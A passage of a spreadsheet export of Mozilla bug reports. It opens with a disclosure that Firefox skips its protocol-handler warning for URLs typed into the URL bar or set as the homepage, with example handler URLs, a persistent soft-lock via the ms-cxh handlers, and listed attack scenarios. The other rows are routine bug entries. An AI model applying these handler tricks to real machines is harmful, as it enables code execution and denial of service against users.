Upon navigating to a protocol handler URL such as “calculator:calc” or “microsoft.windows.camera:aaaa”, browsers warn the user prior to triggering the protocol handler. This is due to how protocol handlers allow for the execution of programs outside of the browser context, and the security of these protocol handlers is outside of the browsers control.
Firefox will raise a warning prior to triggering the protocol handler in the following circumstances:
~ Navigation to a URL via an “&lt;a&gt;” tag.
~ A JavaScript redirect, such as window.open("calculator:calc").
~ Header based-redirects.
Issue description
Despite using a warning if a protocol handler URL is navigated to via the previously specified method, Firefox skips this check if the URL is directly navigated to directly via the URL bar. This can be done by entering it into the URL bar and pressing the “enter” key, or by setting the browser homepage to a URL containing a protocol handler and then re-opening Firefox.
One caveat to the above description is that the first time Firefox encounters a new protocol handler, it appears to silently ignore the request, and then upon any subsequent request it will automatically open.
This effectively circumvents the protection to prevent users from inadvertently executing protocol handlers.
Impact
Windows protocol handlers have been vulnerable to a number of remote code execution vulnerabilities in the past, any of which could have been leveraged in combination with this to function as a zero-click remote code execution vulnerability. Three such vulnerabilities are shown below:
~ https://positive.security/blog/ms-officecmd-rce
~ https://blog.doyensec.com/2018/05/24/electron-win-protocol-handler-bug-bypass.html
~ https://www.bleepingcomputer.com/news/security/new-windows-search-zero-day-added-to-microsoft-protocol-nightmare/
Zero-click Remote Code Execution
Real world situations where this is able to be leveraged as a zero-click remote code execution would include: 
~ Social engineering, where a user is coerced into copy-pasting a URL into Firefox.
~ Compromising a cloud-sync session and setting the user's homepage to a protocol handler URL.
~ Lateral movement within a network, where a user can modify a user’s homepage via modifying config files on a victim's machine via an SMB share functionality.
~ User or system level persistence on a device via modifying either the Firefox configuration files or the windows registry keys to allow setting the user’s homepage.
If an attacker has file access to the victim machine machine, such as the previous two examples, this can be done without the need for a protocol handler vulnerability, as the user can simply add an unsafe protocol handler with user level privileges.
One-click Remote Code Execution
Alternatively for a one-click remote code execution, an attacker could use the Java Network Launch Protocol if Java is installed upon the host. Further information on this can be found in the following whitepaper:
https://cybir.com/wp-content/uploads/2021/06/JNLP-Injection-and-Attacks-Release.pdf
A example of this attack is the the following URL 
“jnlp:https://docs.oracle.com/javase/tutorialJWS/samples/deployment/dynamictree_webstartJWSProject/dynamictree_webstart.jnlp”:
Upon clicking the run button, the Jar file referenced in the URL above is executed, in this case, opening a sample application.
Persistent Denial of Service
Another notable use for this vulnerability would be via the use of the “ms-cxh” and “ms-cxh-full” protocol handlers which can softlock some windows versions by creating a persistent black screen. This can be fixed through a series of commands found in the paper below, but is usually fixed with a full system reboot.
https://papers.vx-underground.org/papers/Windows/Analysis%20and%20Internals/2022-01-16%20-%20Notes%20on%20Windows%20MS-CXH%20and%20MS-CXH-FULL%20handlers.pdf
This was confirmed on an up-to-date windows version found here:
Edition: Windows 10 Home
Version: 21H2
OS Build: 19044.2846
Experience: Windows Feature Experience Pack 120.2212.4190.0
Once this setting is saved and Firefox is closed, every subsequent reopening of Firefox will soft-lock the computer. This will prevent all use of Firefox on the device without changing the specific file system configuration, as Firefox cannot be opened to remove this homepage setting. As this is a saved configuration, this will persist between reboots. To remove this soft-lock, the prefs.js file must be modified to remove the browser.startup.homepage value.
Steps to Replicate
Submit a protocol handler into the URL bar and press the “enter” key. If no applications open, re-submit the value and press the “enter” key again.
Here are three sample protocol handlers that will open an application on a default windows machine:
~ ms-photos:photos
~ microsoft.windows.camera:camera
~ ldap:ldap
To observe the homepage functionality, set the homepage at about:preferences#home to one of the above settings, then close and reopen Firefox. Once again, if no application opens on first reboot, close and reopen Firefox.
Remediation
Implement a protocol handler warning on all instances where a protocol handler is triggered from Firefox.</t>
        </is>
      </c>
      <c r="X6397" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6398">
      <c r="A6398" t="n">
        <v>1023868</v>
      </c>
      <c r="B6398" t="inlineStr">
        <is>
          <t>2014-06-11 06:45:52 -0700</t>
        </is>
      </c>
      <c r="C6398" t="inlineStr">
        <is>
          <t>Treeherder log parser missing job steps whose duration was &gt;=1 hour</t>
        </is>
      </c>
      <c r="D6398" t="inlineStr">
        <is>
          <t>2014-07-09 14:15:26 -0700</t>
        </is>
      </c>
      <c r="E6398" t="n">
        <v>1</v>
      </c>
      <c r="F6398" t="n">
        <v>1</v>
      </c>
      <c r="G6398" t="n">
        <v>7</v>
      </c>
      <c r="H6398" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6398" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6398" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K6398" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6398" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6398" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6398" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6398" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6398" t="inlineStr">
        <is>
          <t>[u=cdawson] [c=log_viewer] [p=100]</t>
        </is>
      </c>
      <c r="Q6398" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6398" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6398" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6398" t="n">
        <v>1</v>
      </c>
      <c r="U6398" t="n">
        <v>0</v>
      </c>
      <c r="V6398" t="n">
        <v>10</v>
      </c>
      <c r="W6398" t="inlineStr">
        <is>
          <t>(I'll move this to the new treeherder component, once created)
Looking at:
http://treeherder-dev.allizom.org/ui/logviewer.html#?job_id=5&amp;repo=mozilla-central
I can't see the "compile" step, which is present in the raw log:
https://tbpl.mozilla.org/php/getParsedLog.php?id=41500075&amp;tree=Mozilla-Central
(Search for "========= Finished compile")
In the treeherder log viewer, after the "downloading to token" step, instead of "compile", it just skips to the next step, which is "set props: vsize testresults".</t>
        </is>
      </c>
      <c r="X6398" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6399">
      <c r="A6399" t="n">
        <v>1241649</v>
      </c>
      <c r="B6399" t="inlineStr">
        <is>
          <t>2016-01-21 14:10:49 -0800</t>
        </is>
      </c>
      <c r="C6399" t="inlineStr">
        <is>
          <t>Hook up `npm version` to be able to bump the install.rdf.in version number and be ready to tag releases</t>
        </is>
      </c>
      <c r="D6399" t="inlineStr">
        <is>
          <t>2016-01-22 01:44:25 -0800</t>
        </is>
      </c>
      <c r="E6399" t="n">
        <v>1</v>
      </c>
      <c r="F6399" t="n">
        <v>1</v>
      </c>
      <c r="G6399" t="n">
        <v>6</v>
      </c>
      <c r="H6399" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6399" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J6399" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K6399" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6399" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6399" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6399" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6399" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6399" t="inlineStr"/>
      <c r="Q6399" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6399" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6399" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6399" t="n">
        <v>1</v>
      </c>
      <c r="U6399" t="n">
        <v>0</v>
      </c>
      <c r="V6399" t="n">
        <v>5</v>
      </c>
      <c r="W6399" t="inlineStr">
        <is>
          <t>I discovered that we can use `npm version` to update the version number in package.json. Additionally, it can also run pre, during &amp; post scripts to do additional tasks.
Hence, to begin with I want to:
- Pre-version bump: run tests (sanity check)
- During version bump: change the version in install.rdf.in.
- Hook up enough to bump the add-on version on for master.
- Start adding some release documentation</t>
        </is>
      </c>
      <c r="X6399" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6400">
      <c r="A6400" t="n">
        <v>916685</v>
      </c>
      <c r="B6400" t="inlineStr">
        <is>
          <t>2013-09-16 00:32:06 -0700</t>
        </is>
      </c>
      <c r="C6400" t="inlineStr">
        <is>
          <t>ASAN use-after free in GC allocation in nsEventListenerManager::SetEventHandler</t>
        </is>
      </c>
      <c r="D6400" t="inlineStr">
        <is>
          <t>2015-02-25 20:16:40 -0800</t>
        </is>
      </c>
      <c r="E6400" t="n">
        <v>1</v>
      </c>
      <c r="F6400" t="n">
        <v>1</v>
      </c>
      <c r="G6400" t="n">
        <v>3</v>
      </c>
      <c r="H6400" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6400" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6400" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K6400" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6400" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6400" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6400" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6400" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6400" t="inlineStr">
        <is>
          <t>[asan][adv-main25+][adv-esr24-1+]</t>
        </is>
      </c>
      <c r="Q6400" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6400" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6400" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T6400" t="n">
        <v>1</v>
      </c>
      <c r="U6400" t="n">
        <v>0</v>
      </c>
      <c r="V6400" t="n">
        <v>17</v>
      </c>
      <c r="W6400" t="inlineStr">
        <is>
          <t>Created attachment 805180
crash.html
The attached testcase crashes the nightly ASAN build.  It require domFuzzLite3. ASAN output attached in stack.txt.</t>
        </is>
      </c>
      <c r="X6400" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6401">
      <c r="A6401" t="n">
        <v>1836962</v>
      </c>
      <c r="B6401" t="inlineStr">
        <is>
          <t>2023-06-06 05:55:07 -0700</t>
        </is>
      </c>
      <c r="C6401" t="inlineStr">
        <is>
          <t>Only trim URL if directionality doesn't change to RTL</t>
        </is>
      </c>
      <c r="D6401" t="inlineStr">
        <is>
          <t>2023-10-10 02:59:52 -0700</t>
        </is>
      </c>
      <c r="E6401" t="n">
        <v>1</v>
      </c>
      <c r="F6401" t="n">
        <v>1</v>
      </c>
      <c r="G6401" t="n">
        <v>2</v>
      </c>
      <c r="H6401" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6401" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6401" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K6401" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6401" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6401" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6401" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6401" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6401" t="inlineStr">
        <is>
          <t>[snt]</t>
        </is>
      </c>
      <c r="Q6401" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6401" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S6401" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T6401" t="n">
        <v>1</v>
      </c>
      <c r="U6401" t="n">
        <v>0</v>
      </c>
      <c r="V6401" t="n">
        <v>20</v>
      </c>
      <c r="W6401" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1833091 +++</t>
        </is>
      </c>
      <c r="X6401" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6402">
      <c r="A6402" t="n">
        <v>327181</v>
      </c>
      <c r="B6402" t="inlineStr">
        <is>
          <t>2006-02-14 11:59:43 -0800</t>
        </is>
      </c>
      <c r="C6402" t="inlineStr">
        <is>
          <t>Improve error reporting for invalid-certificate errors (error page for https, or combined dialog)</t>
        </is>
      </c>
      <c r="D6402" t="inlineStr">
        <is>
          <t>2016-02-03 03:06:12 -0800</t>
        </is>
      </c>
      <c r="E6402" t="n">
        <v>1</v>
      </c>
      <c r="F6402" t="n">
        <v>1</v>
      </c>
      <c r="G6402" t="n">
        <v>3</v>
      </c>
      <c r="H6402" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6402" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6402" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K6402" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6402" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6402" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6402" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6402" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6402" t="inlineStr">
        <is>
          <t>[sg:want] parity-ie</t>
        </is>
      </c>
      <c r="Q6402" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6402" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6402" t="inlineStr">
        <is>
          <t>mozilla1.9beta1</t>
        </is>
      </c>
      <c r="T6402" t="n">
        <v>1</v>
      </c>
      <c r="U6402" t="n">
        <v>3</v>
      </c>
      <c r="V6402" t="n">
        <v>182</v>
      </c>
      <c r="W6402" t="inlineStr">
        <is>
          <t>I propose eliminating or at least minimizing SSL/TLS-related error messages and
warning dialogs in the Firefox UI, particularly in cases where such messages and warnings are arguably not warranted based on the security risk relative to not using SSL/TLS at all. I also suggest modifying the Firefox UI to discourage typical users from modifying the default list of "trusted" CAs and certificates by adding new site or CA certs as warning dialogs pop up.
The overall effect of this proposal would be to present an http-like UI (possibly with an additional information bar message) for sites presenting invalid certificates, instead of using the standard SSL UI (padlock, etc.).
This proposal is based on my n.p.m.crypto posting of March 11, 2005, titled "Strawman proposal for SSL UI changes". Note that (unlike the above-referenced post) this proposal is independent of any UI changes proposed for hypothetical future "extended validation" or "high assurance" certificates. It assumes the use of current "legacy" certificates, and no change to the underlying NSS mechanisms for validating certificates.
Here's the basic proposal:
* Retain the current Firefox UI when SSL/TLS is not used:
  - location bar background is white, with no padlock
  - no padlock or other SSL/TLS-related indicator in status bar
  - site domain name is *not* displayed in the status bar
* Retain the current "normal case" SSL/TLS Firefox UI:
  - location bar background is yellow, with padlock
  - display locked padlock in status bar
  - site domain name from certificate is displayed in status bar
Add the following new SSL/TLS UI cases, for which we do *not* use the traditional "padlock" indicator in any form:
* SSL/TLS connection involving a self-signed certificate or a certificate from an unknown CA:
  - location bar background is white, with no padlock
  - display informational message of some sort (as for blocked popups)
  - display exclamation point in status bar (as for blocked popups)
  - site domain name from cert is *not* displayed in the status bar
* SSL/TLS connection involving a certificate from a known CA where the domain name in the certificate does not match the domain name requested:
  - (optional) display warning dialog describing the potential security risk, and giving the user the option of proceeding or cancelling; if the user chooses to proceed, display the following:
  - location bar background is white, with no padlock
  - display informational message of some sort (as for blocked popups)
  - display "X" mark in status bar (instead of padlock)
  - site domain name from cert is displayed in the status bar
Some follow-on comments:
* "Known CAs" are CAs for which we have a stored certificate with the SSL "trust bit" set on. Any other case (cert not stored or trust bit not set) is treated as an unknown CA. (I try to avoid the term "trusted CA" because of ambiguity over what "trust" actually means.)
* The site domain name should be displayed in the status bar only when we have some reason to assume that it is valid. Hence it should *not* be displayed for self-signed certs and certs from unknown CAs, but *should* always be displayed for certs from known CAs.
* In the case of a self-signed cert or cert from an unknown CA, Firefox should *not* offer users the opportunity to accept the certificate or the certificate's issuing CA as "trusted", at least not from the immediately visible UI.
If an informational message is displayed in this case, then perhaps its dropdown menu could contain an option to not display the informational message in the future for self-signed certs or unknown CAs (similar to the option for blocked popups); in this case the UI indicators would remain the same, except possibly for a question mark replacing the "exclamation mark in circle" accompanying the original informational message.
(The other alternative would be to display no status indicator at all once the informational message had been dismissed; in effect this would treat sites with self-signed certs or certs from unknown CAs as similar in all respects to non-SSL sites.)
The informational message's dropdown menu could also contain a menu item "Edit Certificate Options..." or "Edit SSL Security Options..." (similar to the "Edit Popup Blocker Options..." item on the "blocked popup" informational message), and the resulting dialog box could contain options to accept the site's certificate or a new CA certificate. Future visits to the site would then display the pad lock as for other SSL/TLS connections.
* In the case of a cert from a known CA but with an non-matching domain name, if a warning dialog is to be display, then the warning dialog should be displayed at least once per browser session, without the possibility of turning it off permanently for that site. If an informational message is displayed in this case, then perhaps its dropdown menu can contain an option to not display the
informational message in the future for not matching domain names (similar to the option for self-signed certs or unknown CAs); in this case the UI indicators would remain the same, except for an "X" mark replacing the "exclamation mark in circle" accompanying the original informational message.
(I don't think it makes sense to not display a status bar indicator at all after dismissing the information message, and to treat this case the same as a non-SSL site. There really is something wrong with the site -- it's either misconfigured or is using a stolen key and cert -- and the UI should reflect that.)
* The only way to add new CAs or server certs or to change the default "trust bits" should be through the Firefox preferences UI or (perhaps) through a detailed certificate dialog reached by selecting an item from the dropdown menu associated with an informational message (if used). (This latter option would be similar to the "Edit Popup Blocker Options" menu item displayed for the blocked popups informational message.)</t>
        </is>
      </c>
      <c r="X6402" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6403">
      <c r="A6403" t="n">
        <v>1303734</v>
      </c>
      <c r="B6403" t="inlineStr">
        <is>
          <t>2016-09-19 06:40:52 -0700</t>
        </is>
      </c>
      <c r="C6403" t="inlineStr">
        <is>
          <t>Store textual page metadata from web pages to database in Swift</t>
        </is>
      </c>
      <c r="D6403" t="inlineStr">
        <is>
          <t>2017-05-02 08:40:29 -0700</t>
        </is>
      </c>
      <c r="E6403" t="n">
        <v>1</v>
      </c>
      <c r="F6403" t="n">
        <v>1</v>
      </c>
      <c r="G6403" t="n">
        <v>2</v>
      </c>
      <c r="H6403" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6403" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J6403" t="inlineStr">
        <is>
          <t>Data Storage</t>
        </is>
      </c>
      <c r="K6403" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6403" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6403" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N6403" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6403" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6403" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q6403" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6403" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6403" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6403" t="n">
        <v>1</v>
      </c>
      <c r="U6403" t="n">
        <v>0</v>
      </c>
      <c r="V6403" t="n">
        <v>8</v>
      </c>
      <c r="W6403" t="inlineStr">
        <is>
          <t>Now that we're able to pull down metadata for each pages [1], we need a place to store this data (probably in SQLite) and a way of exposing this data to other parts of the app. At the moment, the only known consumer of this data is the new Activity Stream panel to show richer highlights.
[1] https://bugzilla.mozilla.org/show_bug.cgi?id=1297703</t>
        </is>
      </c>
      <c r="X6403" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6404">
      <c r="A6404" t="n">
        <v>65399</v>
      </c>
      <c r="B6404" t="inlineStr">
        <is>
          <t>2001-01-13 21:14:35 -0800</t>
        </is>
      </c>
      <c r="C6404" t="inlineStr">
        <is>
          <t>Query page falls over if product has no components.</t>
        </is>
      </c>
      <c r="D6404" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:23 -0800</t>
        </is>
      </c>
      <c r="E6404" t="n">
        <v>1</v>
      </c>
      <c r="F6404" t="n">
        <v>1</v>
      </c>
      <c r="G6404" t="n">
        <v>4</v>
      </c>
      <c r="H6404" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6404" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6404" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K6404" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6404" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6404" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6404" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6404" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6404" t="inlineStr"/>
      <c r="Q6404" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6404" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6404" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T6404" t="n">
        <v>1</v>
      </c>
      <c r="U6404" t="n">
        <v>0</v>
      </c>
      <c r="V6404" t="n">
        <v>19</v>
      </c>
      <c r="W6404" t="inlineStr">
        <is>
          <t>Naughty, naughty, someone wasn't looking for other instances of a bug when they
fixed it (bug #40987).  But then, I can't talk, as I verified the bug.
query.cgi should at least give a coherent error.  It should probably also
continue to work, but skip that product so the whole thing doesn't fall over
because of one product (do we have the ability to allow different groups access
to add components to different products?)
If it does work probably, we should probably emit a warning in mail, query.cgi,
the error log or something.
Should check all the .cgis in the product.  I'll try and get around to that
shortly.</t>
        </is>
      </c>
      <c r="X6404" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6405">
      <c r="A6405" t="n">
        <v>537862</v>
      </c>
      <c r="B6405" t="inlineStr">
        <is>
          <t>2010-01-04 19:05:10 -0800</t>
        </is>
      </c>
      <c r="C6405" t="inlineStr">
        <is>
          <t>asyncAuthPrompt can attach to wrong DOM window.</t>
        </is>
      </c>
      <c r="D6405" t="inlineStr">
        <is>
          <t>2010-04-12 14:32:27 -0700</t>
        </is>
      </c>
      <c r="E6405" t="n">
        <v>1</v>
      </c>
      <c r="F6405" t="n">
        <v>1</v>
      </c>
      <c r="G6405" t="n">
        <v>3</v>
      </c>
      <c r="H6405" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6405" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J6405" t="inlineStr">
        <is>
          <t>Password Manager</t>
        </is>
      </c>
      <c r="K6405" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6405" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6405" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6405" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6405" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6405" t="inlineStr">
        <is>
          <t>[3.6.x][sg:low spoof]</t>
        </is>
      </c>
      <c r="Q6405" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6405" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6405" t="inlineStr">
        <is>
          <t>mozilla1.9.3a2</t>
        </is>
      </c>
      <c r="T6405" t="n">
        <v>1</v>
      </c>
      <c r="U6405" t="n">
        <v>0</v>
      </c>
      <c r="V6405" t="n">
        <v>18</v>
      </c>
      <c r="W6405" t="inlineStr">
        <is>
          <t>Created attachment 420023
Patch v.1
Over in bug 499233 I'm adding some code to trigger nsLoginManagerPromper's _doAsyncPrompt from an observer in the factory... [The patch suppresses HTTP auth prompts until a master password has been entered.] I noticed there wasn't a way to map prompts queued in the factory's _asyncPrompts to actual prompter instances (where _doAsyncPrompt lives). And then realized this could be fairly bad. :(
Then prompter initializes a LoginManagerPrompter, it includes the DOMWindow for which the prompt is to be bound. But when _doAsyncPrompt runs, it pulls an arbitrary queued prompt from _asyncPrompts, and processes it in the current prompter instance. If the prompt was queued from a different prompter, it will be attached to the wrong DOM window (ie, tab).
I don't *think* this is directly exploitable, in that that promptAuth() uses the provided channel (not window) for login manager lookups, so we won't end up sending/saving passwords for the wrong host.
But it does mean that there's the potential for evil.com to get it's HTTP auth prompt attached to bank.com's tab, and then an inattentive user will likely type in their bank.com username and password.</t>
        </is>
      </c>
      <c r="X6405" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6406">
      <c r="A6406" t="n">
        <v>527276</v>
      </c>
      <c r="B6406" t="inlineStr">
        <is>
          <t>2009-11-07 18:19:40 -0800</t>
        </is>
      </c>
      <c r="C6406" t="inlineStr">
        <is>
          <t>[@font-face] investigate support for OpenType sanitizer library</t>
        </is>
      </c>
      <c r="D6406" t="inlineStr">
        <is>
          <t>2011-03-01 06:59:39 -0800</t>
        </is>
      </c>
      <c r="E6406" t="n">
        <v>1</v>
      </c>
      <c r="F6406" t="n">
        <v>1</v>
      </c>
      <c r="G6406" t="n">
        <v>3</v>
      </c>
      <c r="H6406" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6406" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6406" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K6406" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6406" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6406" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6406" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6406" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6406" t="inlineStr">
        <is>
          <t>[sg:want P1][attachment 493106 landed 1.9.1.17]</t>
        </is>
      </c>
      <c r="Q6406" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6406" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6406" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6406" t="n">
        <v>1</v>
      </c>
      <c r="U6406" t="n">
        <v>0</v>
      </c>
      <c r="V6406" t="n">
        <v>85</v>
      </c>
      <c r="W6406" t="inlineStr">
        <is>
          <t>Google has published their OpenType sanitizer library:
http://code.google.com/p/ots/
This library essentially validates OpenType fonts on a table-by-table basis, reconstructing each on the fly.
Chromium tracking bug:
http://code.google.com/p/chromium/issues/detail?id=17818
Integration into WebKit:
https://bugs.webkit.org/show_bug.cgi?id=31106
The question here is whether this revalidation is worthwhile or whether it's just enforcing spec-correctness that doesn't actually guarantee safety.</t>
        </is>
      </c>
      <c r="X6406" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6407">
      <c r="A6407" t="n">
        <v>589814</v>
      </c>
      <c r="B6407" t="inlineStr">
        <is>
          <t>2010-08-23 09:24:00 -0700</t>
        </is>
      </c>
      <c r="C6407" t="inlineStr">
        <is>
          <t>Install ANGLE libraries on test machines</t>
        </is>
      </c>
      <c r="D6407" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6407" t="n">
        <v>1</v>
      </c>
      <c r="F6407" t="n">
        <v>1</v>
      </c>
      <c r="G6407" t="n">
        <v>5</v>
      </c>
      <c r="H6407" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6407" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6407" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6407" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6407" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6407" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6407" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6407" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6407" t="inlineStr"/>
      <c r="Q6407" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6407" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6407" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6407" t="n">
        <v>1</v>
      </c>
      <c r="U6407" t="n">
        <v>0</v>
      </c>
      <c r="V6407" t="n">
        <v>29</v>
      </c>
      <c r="W6407" t="inlineStr">
        <is>
          <t>Short version: could you consider installing OSMesa on the test machines?
In bug 582053 we are discussing a new Mochitest covering WebGL.
